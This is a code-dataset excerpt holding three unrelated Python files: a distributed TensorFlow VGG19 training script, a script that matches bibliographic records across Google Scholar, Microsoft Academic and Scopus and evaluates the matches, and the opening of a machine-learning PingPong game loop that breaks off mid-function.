specification\n# 4) run on TFoS\n\n\nflags = tf.app.flags\nflags.DEFINE_string(\"data_dir\", \"./puzzle-training-set-Q2\",\n \"Directory for storing mnist data\")\nflags.DEFINE_integer(\"task_index\", None, \n \"Worker task index, should be >= 0. task_index=0 is \"\n \"the master worker task the performs the variable \"\n \"initialization \")\nflags.DEFINE_integer(\"replicas_to_aggregate\", None,\n \"Number of replicas to aggregate before parameter update\"\n \"is applied (For sync_replicas mode only; default: \"\n \"num_workers)\")\nflags.DEFINE_integer(\"train_steps\", 2000,\n \"Number of (global) training steps to perform\")\nflags.DEFINE_integer(\"batch_size\", 20, \"Training batch size\")\nflags.DEFINE_float(\"learning_rate\", 0.01, \"Learning rate\")\nflags.DEFINE_boolean(\"sync_replicas\", True,\n \"Use the sync_replicas (synchronized replicas) mode, \"\n \"wherein the parameter updates from workers are aggregated \"\n \"before applied to avoid stale gradients\")\nflags.DEFINE_boolean(\n \"existing_servers\", False, \"Whether servers already exists. If True, \"\n \"will use the worker hosts via their GRPC URLs (one client process \"\n \"per worker host). Otherwise, will create an in-process TensorFlow \"\n \"server.\"\n)\nflags.DEFINE_string(\"ps_hosts\",\"localhost:2222\",\n \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"worker_hosts\", \"localhost:2223,localhost:2224\",\n \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"job_name\", None,\"job name: worker or ps\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(unused_argv):\n puzzleset = PuzzleSet.read_data_sets(FLAGS.data_dir)\n\n if FLAGS.job_name is None or FLAGS.job_name == \"\":\n raise ValueError(\"Must specify an explicit `job_name`\")\n if FLAGS.task_index is None or FLAGS.task_index == \"\":\n raise ValueError(\"Must specify an explicit `task_index`\")\n\n print(\"job name = {0}\".format(FLAGS.job_name))\n print(\"job index = {0}\".format(FLAGS.task_index))\n\n # Construct the cluster and start the server\n ps_spec = FLAGS.ps_hosts.split(\",\")\n worker_spec = FLAGS.worker_hosts.split(\",\")\n\n # Get the number of workers.\n num_workers = len(worker_spec)\n\n cluster = tf.train.ClusterSpec({\n \"ps\": ps_spec,\n \"worker\": worker_spec\n })\n\n # parameter servers stop here.\n if not FLAGS.existing_servers:\n # Not using existing servers. Create an in-process server.\n server = tf.train.Server(cluster, job_name=FLAGS.job_name, task_index=FLAGS.task_index)\n if FLAGS.job_name == \"ps\":\n server.join()\n\n is_chief = FLAGS.task_index == 0\n\n # GPU = 0\n cpu = 0\n worker_device = \"/job:worker/task:%d/cpu:%d\" % (FLAGS.task_index, cpu)\n\n def _load_fn(unused_op):\n return 1\n\n greedy = tf.contrib.training.GreedyLoadBalancingStrategy(1, _load_fn)\n\n with tf.device(\n tf.train.replica_device_setter(\n worker_device=worker_device,\n cluster=cluster,\n ps_strategy=greedy)):\n # use Parameter Server to persist the global step.\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n\n # the model\n train_mode = tf.placeholder(tf.bool)\n vgg = vgg19.VGG19()\n vgg.build(train_mode)\n\n # optimizer\n cross_entropy = -tf.reduce_sum(vgg.labels * tf.log(tf.clip_by_value(vgg.prob, 1e-10, 1.0)))\n opt = tf.train.AdamOptimizer(FLAGS.learning_rate)\n\n if FLAGS.sync_replicas:\n if FLAGS.replicas_to_aggregate is None:\n replicas_to_aggregate = num_workers\n else:\n replicas_to_aggregate = FLAGS.replicas_to_aggregate\n\n print(\"replicas_to_aggregate: \" + str(replicas_to_aggregate))\n opt = tf.train.SyncReplicasOptimizer(\n opt,\n replicas_to_aggregate=replicas_to_aggregate,\n total_num_replicas=num_workers,\n name=\"mnist_sync_replicas\"\n )\n\n # train step\n train_step = opt.minimize(cross_entropy, global_step=global_step)\n\n if FLAGS.sync_replicas:\n local_init_op = opt.local_step_init_op\n if is_chief:\n local_init_op = opt.chief_init_op\n\n ready_for_local_init_op = opt.ready_for_local_init_op\n\n # Initial token and chief queue runners required by the sync_replicas mode\n chief_queue_runner = opt.get_chief_queue_runner()\n sync_init_op = opt.get_init_tokens_op()\n\n init_op = tf.global_variables_initializer()\n train_dir = tempfile.mkdtemp()\n\n if FLAGS.sync_replicas:\n sv = tf.train.Supervisor(\n is_chief=is_chief,\n logdir=train_dir,\n init_op=init_op,\n local_init_op=local_init_op,\n ready_for_local_init_op=ready_for_local_init_op,\n recovery_wait_secs=1,\n global_step=global_step\n )\n else:\n sv = tf.train.Supervisor(\n is_chief=is_chief,\n logdir=train_dir,\n init_op=init_op,\n recovery_wait_secs=1,\n global_step=global_step\n )\n\n sess_config = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False,\n device_filters=[\"/job:ps\", \"/job:worker/task:%d\" % FLAGS.task_index]\n )\n\n # The chief worker (task_index==0) session will prepare the session,\n # while the remaining workers will wait for the preparation to complete.\n if is_chief:\n print(\"Worker %d: Initializing session...\" % FLAGS.task_index)\n else:\n print(\"Worker %d: Waitingfor session to be initialized...\" % FLAGS.task_index)\n\n if FLAGS.existing_servers:\n server_grpc_url = \"grpc://\" + worker_spec[FLAGS.task_index]\n print(\"Using existing server at: %s\" % server_grpc_url)\n sess = sv.prepare_or_wait_for_session(server_grpc_url, config=sess_config)\n else:\n sess = sv.prepare_or_wait_for_session(server.target, config=sess_config)\n\n print(\"Worker %d: Session initialization complete.\" % FLAGS.task_index)\n\n if FLAGS.sync_replicas and is_chief:\n # Chief worker will start the chief queue runner and call the init op.\n sess.run(sync_init_op)\n sv.start_queue_runners(sess, [chief_queue_runner])\n\n # Perform training\n time_begin = time.time()\n print(\"Training begins @ %f\" % time_begin)\n\n local_step = 0\n while True:\n # Training feed\n batch_xs, batch_ys = puzzleset.train_next_batch(FLAGS.batch_size)\n train_feed = {vgg.images: batch_xs, vgg.labels: batch_ys, vgg.keep_prob: 0.5, train_mode: True}\n _, step = sess.run([train_step, global_step], feed_dict=train_feed)\n local_step += 1\n\n now = time.time()\n print(\"%f: Worker %d: training step %d done (global step: %d)\" % (now, FLAGS.task_index, local_step, step))\n if step >= FLAGS.train_steps:\n break\n\n time_end = time.time()\n print(\"Training ends @ %f\" % time_end)\n training_time = time_end - time_begin\n print(\"Training elapsed time: %f s\" % training_time)\n\n # Validation feed\n val_images, val_labels = puzzleset.validation_batch()\n val_feed = {vgg.images: val_images, vgg.labels: val_labels, train_mode: False}\n val_xent = sess.run(cross_entropy, feed_dict=val_feed)\n print(\"After %d training step(s), validation cross entropy = %g\" % (FLAGS.train_steps, val_xent))\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"image_classify_dist.py","file_name":"image_classify_dist.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"300514607","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 27 15:21:17 2017\n\n@author: paszczak\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 8 17:03:39 2017\n\n@author: paszczak\n\"\"\"\n\nimport json\nimport re\nimport itertools\n#from pprint import pprint\n#import sys\nimport unicodedata\nimport difflib\nimport csv\n# load sample of 400!!!\n\n#metaConditionsThreshold = 1 - defined dynamically below\n\n\n\n\n\nauthorMatchedRecords = []\nyearMatchedRecords = []\ntitle95MatchedRecords = []\nvenueMatchedRecords = []\ndoiUrlmatchedRecords = []\ntitle80MatchedRecords = []\n### data cleansing - improved\n\n#Ti -> simplified Titles, removing spaces, repeated letters, vowels\n#Ti -> simplified Titles, removing spaces, repeated letters, vowels\ndef simplifyTitle (text):\n \"\"\"function normalisng text to lowercase letters, removing all non-alphanumeric signs, then removing all spaces, repeated (double) letters, and vowels from string\"\"\"\n text = text.lower()\n # remove ' inf ', ' sub ' - in MA such notation is used to denote subscripts etc.;\n text = text.replace(' inf ','')\n text = text.replace(' sup ','')\n \n #limiting title string to 150 chars, the maximum in Google Scholar\n text = text[:148]\n \n text = re.sub('[^a-zA-Z0-9\\n\\.]', ' ', text)\n \n \n text = text.replace(\".\", \"\")\n text = text.replace(\" \", \"\")\n text = \" \".join(text.split())\n \n text = ''.join(ch for ch, _ in itertools.groupby(text)) #remove all repeated letters, illiterate -> iliterate\n \n vowels = ('a', 'e', 'i', 'o', 'u')\n text = ''.join([l for l in text if l not in vowels]) #remove all vowels\n \n text = unicodedata.normalize('NFKD', text).encode('ASCII', 'ignore')\n \n text = str(text).encode('utf-8')\n return (str(text))\n\n\ndef matchRecords (doc1, doc2, condition, titleSimilarityThreshold):\n #pubyear2 = int(doc2[\"_ - Y\"])\n #pubyearRange = range((pubyear2-1),(pubyear2+2),1)\n jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n jointURL = [i for i in doc1[\"_ - SU\"] if i in doc2[\"_ - SU\"]]\n if \"_ - DOI\" in doc1 and \"_ - DOI\" in doc2:\n if doc1[\"_ - DOI\"] is not None and doc2[\"_ - DOI\"] is not None:\n jointDOI = [i for i in doc1[\"_ - DOI\"] if i in doc2[\"_ - DOI\"]]\n else:\n jointDOI = []\n else:\n jointDOI = []\n \n titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n \n titleMatch = 0\n yearMatch = 0\n authorMatch = 0\n doiurlMatch = 0\n venueMatch= 0\n askedForConfirmation = 0\n \n \n if titleOverlap >= titleSimilarityThreshold:\n titleMatch = 1 \n if doc1[\"_ - Y\"] == doc2[\"_ - Y\"]:\n yearMatch = 1 \n if len(jointAuthor) != 0:\n authorMatch = 1\n if len(jointURL) + len(jointDOI) > 0:\n doiurlMatch = 1\n if doc1[\"simplifiedVenue\"] == doc2[\"simplifiedVenue\"]:\n venueMatch = 1\n #askForConfirmation (\"fully matched, confirm merge?\", default=\"yes\")\n \n sumofflags = titleMatch + yearMatch + authorMatch + doiurlMatch + venueMatch\n \n if (sumofflags >= condition):\n mergeConfirmation = True\n #print (\"Title, Pub Year, Authors - matched; records hence matched\")\n #print (mergeConfirmation)\n else:\n mergeConfirmation = 0\n \n #else:\n #question = str(\"title match: %s, publ year match: %s, author match: %s\" % (titleMatch, yearMatch, authorMatch))\n #mergeConfirmation = askForConfirmation (question, doc1, doc2, default=\"yes\")\n #askedForConfirmation = 1\n \n \n return (mergeConfirmation, doc1, doc2, askedForConfirmation)\n\n\n\n# DOI/URL\ndef matchDOI(jsonList1, jsonList2, doicount, metaConditionsThreshold):\n matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"_ - DOI\"] is not None:\n for doc2 in jsonList2:\n if doc2[\"_ - DOI\"] == doc1[\"_ - DOI\"]:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1)\n questionCount = questionCount + askedConfirmation\n if mergeConfirmation == True:\n #print(\"yup! maid %s, scopusID %s\" % (doc1[\"_ - Id\"],doc2[\"_ - Id\"]))\n \n matchedEntry[\"scopusID\"] = c[\"_ - Id\"] #scopusID\n matchedEntry[\"maID\"] = b[\"_ - Id\"] #ma ID\n \n flag = 0\n for element in doiUrlmatchedRecords:\n if element[\"maID\"] == b[\"_ - Id\"]:\n flag = 1\n #print(matchedRecords)\n #print(\"ids found already: elementid %s, newid %s\" % (element[\"maID\"], b[\"_ - Id\"]))\n if flag == 0:\n doiUrlmatchedRecords.append(dict(matchedEntry))\n #print(\"appended new matched record\")\n \n #print(doc1, \"/n\" ,doc2)\n doicount = doicount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n #input(\"Match by DOI ended, with %s entries matched and %s questions asked, press enter...\" % (doicount, questionCount))\n return doicount, questionCount\n \ndef matchURLs (jsonList1, jsonList2, urlcount, metaConditionsThreshold):\n matchedEntry = {}\n questionCount = 0\n for doc2 in jsonList2:\n if doc2[\"_ - SU\"] is not None:\n for doc1 in jsonList1:\n jointURL = [i for i in doc1[\"_ - SU\"] if i in doc2[\"_ - SU\"]]\n if len(jointURL) > 0:\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1)\n questionCount = questionCount +askedConfirmation\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n flag = 0\n for element in doiUrlmatchedRecords:\n if element[\"maID\"] == b[\"_ - Id\"]:\n element[\"gsID\"] = c[\"_ - Id\"]\n flag = 1\n #print(\"extended matched record!\")\n if flag == 0:\n matchedEntry = {}\n matchedEntry[\"maID\"] = b[\"_ - Id\"]\n matchedEntry[\"gsID\"] = c[\"_ - Id\"]\n doiUrlmatchedRecords.append(dict(matchedEntry))\n #print(\"appended new matched record\")\n \n urlcount = urlcount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n #input(\"Match by URL ended, with %s entries matched and %s questions asked, press enter...\" % (urlcount, questionCount))\n \n return urlcount, questionCount\n\ntitleMatchedRecords = [] \nmetadataMatchedRecords = [] \n\ndef appendMatchTitle(doc1, doc2, idString1, idString2, submissionArray):\n \n flag = 1\n recordPos = 0\n \n matchedEntry = {}\n matchedEntry[idString1] = doc1[\"_ - Id\"]\n matchedEntry[idString2] = doc2[\"_ - Id\"]\n \n for element in submissionArray:\n \n shared_keyvals = set(element.items()) & set(matchedEntry.items())\n \"\"\"\n logic:\n if 2 keyval pairs the same- do not append duplicate\n if in the loop no match or conflicting match found (meaning: 0-2 shared keys AND 0 shared keyvals or 2 shared keys AND 1 shared keyvals)\n if 1 shared keyvals & 1 shared key -> update record with new, non-conflicting key-val pair\n \"\"\"\n \n if len(shared_keyvals) == 2:\n #exact same match found, change flag in order not to add new entry\n flag = 0\n elif len(shared_keyvals) == 1:\n recordPos = submissionArray.index(element)\n \n if idString2 not in element:\n flag = 0\n element[idString2] = doc2[\"_ - Id\"]\n submissionArray[recordPos].update(element)\n elif idString1 not in element:\n element[idString1] = doc1[\"_ - Id\"]\n submissionArray[recordPos].update(element)\n flag = 0\n \n \n if flag == 1:\n submissionArray.append(dict(matchedEntry))\n #print(\"appended new matched record\")\n \n \n return submissionArray\n\n\n# Ti\n# remove ' inf ' or ' sub '\n\ndef matchTitle(jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if doc2[\"simplifiedTi\"] == doc1[\"simplifiedTi\"]:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\ndef matchCombined(jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if titleOverlap > 0.95:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 0.95)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\ndef matchTitleSimilar(tiSimilarityThreshold, jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n \n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if titleOverlap > tiSimilarityThreshold:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, tiSimilarityThreshold)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\n\ndef matchVenue(jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedVenue\"] is not \"b\\\"b'nn'\\\"\" or doc1[\"simplifiedVenue\"] is not \"b\\\"b''\\\"\":\n for doc2 in jsonList2:\n #titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n \n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if doc2[\"simplifiedVenue\"] == doc1[\"simplifiedVenue\"]:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\ndef matchAuthor (jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if len(jointAuthor) != 0:\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n \n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n questionCount = 0\n return titlecount, questionCount, submissionArray\n\ndef matchYear (jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if doc1[\"_ - Y\"] ==doc2[\"_ - Y\"]:\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n \n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n questionCount = 0\n return titlecount, questionCount, submissionArray\n\n\n### compare with golden standard\n\ndef calculateOverlap (x,y):\n overlapFlag = 0\n \n for element in x:\n if \"maID\" in element:\n for match in y:\n if \"maID\" in match:\n if element[\"maID\"] == match[\"maID\"]:\n shared_items = set(element.items()) & set(match.items())\n if len(element) == len(shared_items) and len(element) == len(match):\n overlapFlag = overlapFlag+1\n elif \"gsID\" in element:\n for match in y:\n if \"gsID\" in match:\n if element[\"gsID\"] == match[\"gsID\"]:\n shared_items = set(element.items()) & set(match.items())\n if len(element) == len(shared_items) and len(element) == len(match):\n overlapFlag = overlapFlag+1\n precision = overlapFlag/(len(x))\n recall = overlapFlag/(len(y))\n F = 2 * (precision * recall)/(precision+recall)\n \n resultsArray = []\n resultsArray.append(precision)\n resultsArray.append(recall)\n resultsArray.append(F)\n \n return resultsArray\n \n \n\n\n############ reading in files\n# golden standard sample of matches\ndirectory= \"data/overlapGoldenSample/\"\nwith open(str(directory+\"overlap_400_matches2.json\")) as data_file:\n #data = list(data_file)\n matchesJson = json.load(data_file)\n\n\n\n# cleansed ca400 records from each database\nfilename = \"_keyword_1_natural_sciences.json\"\ndirectory= \"data/filteredJSONs/\"\n\nwith open(str(directory+\"google_scholar_sample400\"+filename), 'r') as fp:\n gsJson400 = json.load(fp)\n\nwith open(str(directory+\"MA_sample400\"+filename), 'r') as fp:\n maJson400 = json.load(fp)\n\nwith open(str(directory+\"scopus_sample400\"+filename), 'r') as fp:\n scopusJson400 = json.load(fp)\n \ndoicount = 0\nurlcount = 0\n\n\nmaScopCount = 0\ngsScopCount = 0\ngsMaCount = 0\nmetaConditionsThreshold = 0\n\nfor i in range(1,6):\n metaConditionsThreshold = i\n print(metaConditionsThreshold)\n print(\"metaConditionThreshold\")\n \n print(\"doi-url matching...\")\n #DOI matching: SCOPUS <-> MA, both sides\n (doicount, questionCountDOI) = matchDOI (maJson400, scopusJson400, doicount, metaConditionsThreshold)\n #askForConfirmation (\"finished matching DOIs, begin with URLs (GoogleScholar - MA)?\", \"\", \"\", default=\"yes\")\n (urlcount, questionCountURL) = matchURLs (maJson400, gsJson400, urlcount, metaConditionsThreshold)\n \n print(\"title matching...\")\n (maScopCount, questionCountTitle, titleMatchedRecords) = matchTitle (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, titleMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, titleMatchedRecords) = matchTitle (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, titleMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, titleMatchedRecords) = matchTitle (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, titleMatchedRecords, metaConditionsThreshold)\n \n print(\"author matching...\")\n (maScopCount, questionCountTitle, authorMatchedRecords) = matchAuthor (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, authorMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, authorMatchedRecords) = matchAuthor (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, authorMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, authorMatchedRecords) = matchAuthor (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, authorMatchedRecords, metaConditionsThreshold)\n \n print(\"pubyear matching...\")\n (maScopCount, questionCountTitle, yearMatchedRecords) = matchYear (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, yearMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, yearMatchedRecords) = matchYear (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, yearMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, yearMatchedRecords) = matchYear (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, yearMatchedRecords, metaConditionsThreshold)\n \n print(\"title_similar 1 matching...\")\n (maScopCount, questionCountTitle, title80MatchedRecords) = matchTitleSimilar (0.9, maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, title80MatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, title80MatchedRecords) = matchTitleSimilar (0.9, gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, title80MatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, title80MatchedRecords) = matchTitleSimilar (0.9, gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, title80MatchedRecords, metaConditionsThreshold)\n \n print(\"title_similar 2 matching...\")\n (maScopCount, questionCountTitle, title95MatchedRecords) = matchTitleSimilar (0.95, maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, title95MatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, title95MatchedRecords) = matchTitleSimilar (0.95, gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, title95MatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, title95MatchedRecords) = matchTitleSimilar (0.95, gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, title95MatchedRecords, metaConditionsThreshold)\n \n print(\"pub venue matching...\")\n (maScopCount, questionCountTitle, venueMatchedRecords) = matchVenue (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, venueMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, venueMatchedRecords) = matchVenue (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, venueMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, venueMatchedRecords) = matchVenue (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, venueMatchedRecords, metaConditionsThreshold)\n \n \n \n #doiURLresults = calculateOverlap (doiUrlmatchedRecords, matchesJson)\n combinedMatchedRecords = list(doiUrlmatchedRecords)\n \n print(\"combined matching...\")\n (maScopCount, questionCountTitle, combinedMatchedRecords) = matchCombined (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, combinedMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, combinedMatchedRecords) = matchCombined (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, combinedMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, combinedMatchedRecords) = matchCombined (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, combinedMatchedRecords, metaConditionsThreshold)\n \n \n \n doiURLresults = calculateOverlap (doiUrlmatchedRecords, matchesJson)\n titleResults = calculateOverlap (titleMatchedRecords, matchesJson)\n title80Results = calculateOverlap (title80MatchedRecords, matchesJson)\n title95results = calculateOverlap (title95MatchedRecords, matchesJson)\n venueResults = calculateOverlap (venueMatchedRecords, matchesJson)\n authorResults = calculateOverlap (authorMatchedRecords, matchesJson)\n yearResults = calculateOverlap (yearMatchedRecords, matchesJson)\n combinedResults = calculateOverlap (combinedMatchedRecords, matchesJson)\n \n \n header = [\"precision\", \"recall\", \"F\"]\n rows = zip(header, doiURLresults, titleResults, title80Results, title95results, venueResults, authorResults, yearResults, combinedResults)\n directory= \"data/overlapGoldenSample/\"\n with open(str(directory+\"testResults.csv\"), 'a') as myfile:\n wr = csv.writer(myfile, delimiter=\";\")\n \n \n for val in rows:\n wr.writerow(val)\n \n print(\"resetting tables\")\n doiUrlmatchedRecords = []\n titleMatchedRecords = []\n title80MatchedRecords = []\n authorMatchedRecords = []\n yearMatchedRecords = []\n title95MatchedRecords = []\n venueMatchedRecords = []\n combinedMatchedRecords = []\n \n \n #(metadataprecision, metadatarecall, metadataURLf) = calculateOverlap (doiUrlmatchedRecords, matchesJson)\n","sub_path":"overlap analysis/2017_11_overlap_experiment_combine_all_methods.py","file_name":"2017_11_overlap_experiment_combine_all_methods.py","file_ext":"py","file_size_in_byte":23691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600366419","text":"import pygame\nimport time\nimport os.path\n\nfrom mlgame.gamedev.generic import quit_or_esc\nfrom mlgame.communication import game as comm\n\nfrom . import gamecore\nfrom .pingpong import Screen\nfrom .gamecore import GameStatus, PlatformAction, Scene\nfrom .record import get_record_handler\n\nclass PingPong:\n \"\"\"\n The game core for the machine learning mode\n \"\"\"\n def __init__(self, fps: int, difficulty, game_over_score: int, record_progress):\n \"\"\"\n Constructor\n\n @param fps The fps of the game\n @param difficulty The difficulty of the game\n @param game_over_score The game will stop when either side reaches this score\n @param record_progress Whether to record the game process or not\n \"\"\"\n self._ml_1P = \"ml_1P\"\n self._ml_2P = \"ml_2P\"\n self._ml_execute_time = 1.0 / fps\n self._frame_delayed = [0, 0] # 1P, 2P\n self._score = [0, 0] # 1P, 2P\n self._game_over_score = game_over_score\n\n self._record_handler = get_record_handler(record_progress, \"ml_\" + str(difficulty))\n\n self._scene = Scene(difficulty)\n self._screen = Screen(Scene.area_rect.size, self._scene.draw_gameobjects)\n\n def game_loop(self):\n \"\"\"\n The main loop of the game execution\n \"\"\"\n comm.wait_all_ml_ready()\n\n while not quit_or_esc():\n scene_info = self._scene.get_scene_info()\n\n # Send the scene info to the ml processes and wait for commands\n command_1P, command_2P = self._make_ml_execute(scene_info)\n\n scene_info[\"command_1P\"] = command_1P.value\n scene_info[\"command_2P\"] = command_2P.value\n self._record_handler(scene_info)\n\n # Update the scene\n game_status = self._scene.update(command_1P, command_2P)\n\n self._screen.update(self._score, self._scene._ball.speed)\n\n # If either of two sides wins, reset the scene and wait for ml processes\n # getting ready for the next round\n if game_status != GameStatus.GAME_ALIVE:\n scene_info = self._scene.get_scene_info()\n comm.send_to_all_ml(scene_info)\n\n scene_info[\"command_1P\"] = scene_info[\"command_2P\"] = None\n self._record_handler(scene_info)\n\n print(\"Frame: {}, Status: {}\"\n .format(scene_info[\"frame\"], game_status.value))\n\n if self._game_over(game_status):\n break\n\n self._scene.reset()\n self._frame_delayed = [0, 0]\n # Wait for ml processes doing their resetting jobs\n comm.wait_all_ml_ready()\n\n self._print_result()\n\n def _make_ml_execute(self, scene_info):\n \"\"\"\n Send the scene_info to the ml process and wait for the instructions\n \"\"\"\n comm.send_to_all_ml(scene_info)\n time.sleep(self._ml_execute_time)\n cmd_received = comm.recv_from_all_ml()\n\n 